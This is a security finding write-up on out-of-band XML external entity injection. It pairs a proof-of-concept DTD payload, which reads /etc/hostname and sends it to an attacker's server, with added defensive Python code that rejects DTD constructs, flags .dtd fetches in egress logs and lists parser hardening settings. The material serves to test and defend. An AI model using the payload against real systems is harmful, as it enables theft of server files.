V5 - Validation/Sanitization
OOB (Out of Band) XXE
POC
Create a payload.dtd file with the following content and host it on a server you control:

<!ENTITY % file SYSTEM "file:///etc/hostname"><!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http:///?x=%file;'>">%eval;

In the vulnerable website, submit the following in the input area:

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http:///payload.dtd"> %xxe;]>

Then check the access logs of your server. The XML parser first fetches payload.dtd, then follows the entity it defines and sends the contents of /etc/hostname to the attacker's server as the x query parameter of a second request:
Impact: High
Likelihood: High
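The mitigation for this finding is to refuse DTD constructs in untrusted XML before a DTD-aware parser ever sees them, and to watch egress logs for the tell-tale fetch of a .dtd file by an application server. The following is an added example written for this write-up, not code from the original report; the function names, the sample documents and the egress log format are all constructed assumptions. It reuses the OOB payload shown above (with the attacker host left blank exactly as on the page) as the rejected input.

```python
"""Defensive gate and egress detection for out-of-band XXE.

Added example (not from the original write-up). All names below are
assumptions made for this illustration.
"""
import re
import xml.etree.ElementTree as ET

# Byte patterns for the DTD constructs an OOB XXE payload depends on.
# Case-insensitive so odd casing does not slip past the gate.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)
ENTITY_RE = re.compile(rb"<!ENTITY", re.IGNORECASE)
PARAM_ENTITY_RE = re.compile(rb"<!ENTITY\s+%", re.IGNORECASE)
EXTERNAL_RE = re.compile(rb"\b(?:SYSTEM|PUBLIC)\s+[\"']", re.IGNORECASE)


def _as_bytes(data):
    return data.encode("utf-8") if isinstance(data, str) else data


def find_xxe_indicators(data):
    """Return the names of DTD/XXE indicators present in the raw document.

    The scan is deliberately crude and fails closed: a DOCTYPE inside an XML
    comment is still reported, because rejecting a rare legitimate document
    is cheaper than letting an out-of-band exfiltration through.
    """
    data = _as_bytes(data)
    found = []
    if DOCTYPE_RE.search(data):
        found.append("doctype")
        # Only look for SYSTEM/PUBLIC once a DTD is present, so element text
        # that merely contains the word SYSTEM is not flagged.
        if EXTERNAL_RE.search(data):
            found.append("external_reference")
    if ENTITY_RE.search(data):
        found.append("entity_declaration")
    if PARAM_ENTITY_RE.search(data):
        found.append("parameter_entity")
    return found


def safe_parse(data):
    """Parse untrusted XML only if it carries no DTD constructs at all."""
    data = _as_bytes(data)
    indicators = find_xxe_indicators(data)
    if indicators:
        raise ValueError("rejected XML with DTD constructs: " + ", ".join(indicators))
    return ET.fromstring(data)


# Constructed sample documents (not captured traffic). OOB_PAYLOAD is the
# DOCTYPE from the write-up above, with the attacker host left blank as there.
OOB_PAYLOAD = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http:///payload.dtd"> %xxe;]>'
    b"<foo>test</foo>"
)
LEGIT_WITH_DTD = b'<?xml version="1.0"?><!DOCTYPE note SYSTEM "note.dtd"><note>hi</note>'
BENIGN = b'<?xml version="1.0"?><order><id>42</id></order>'


def flag_dtd_fetches(proxy_lines):
    """Return (client, url) for egress log entries that fetch a .dtd resource.

    An application server has no business pulling DTDs from the internet; the
    first request of an OOB XXE chain is exactly such a fetch. Constructed log
    format: '<timestamp> <client-ip> <METHOD> <url> <status>'.
    """
    hits = []
    for line in proxy_lines:
        parts = line.split()
        if len(parts) < 5:
            continue
        _ts, client, _method, url, _status = parts[:5]
        path = url.split("?", 1)[0]
        if path.lower().endswith(".dtd"):
            hits.append((client, url))
    return hits


# Constructed egress proxy log: 203.0.113.9 is a documentation-range address.
PROXY_LOG = [
    "2024-01-01T10:00:00Z 10.0.0.5 GET https://cdn.example.net/app.js 200",
    "2024-01-01T10:00:01Z 10.0.0.5 GET http://203.0.113.9/payload.dtd 200",
    "2024-01-01T10:00:01Z 10.0.0.5 GET http://203.0.113.9/?x=web-01 200",
]

if __name__ == "__main__":
    print("OOB payload indicators:", find_xxe_indicators(OOB_PAYLOAD))
    print("parsed benign root:", safe_parse(BENIGN).tag)
    print("suspicious egress:", flag_dtd_fetches(PROXY_LOG))
```

The gate rejects the legitimate document that merely references note.dtd as well; that is the intended trade-off for an internet-facing endpoint, and such clients should be moved to a DTD-free schema. The gate is a belt to the parser's braces, not a replacement: the DTD-aware parser itself must still be hardened (for lxml, `etree.XMLParser(resolve_entities=False, no_network=True, load_dtd=False)`; for Java's DocumentBuilderFactory, the `http://apache.org/xml/features/disallow-doctype-decl` feature set to true). On the detection side, the second log line is the DTD fetch that `flag_dtd_fetches` reports; the third line, the request carrying the hostname in `x=`, is the exfiltration the write-up observes from the attacker's side.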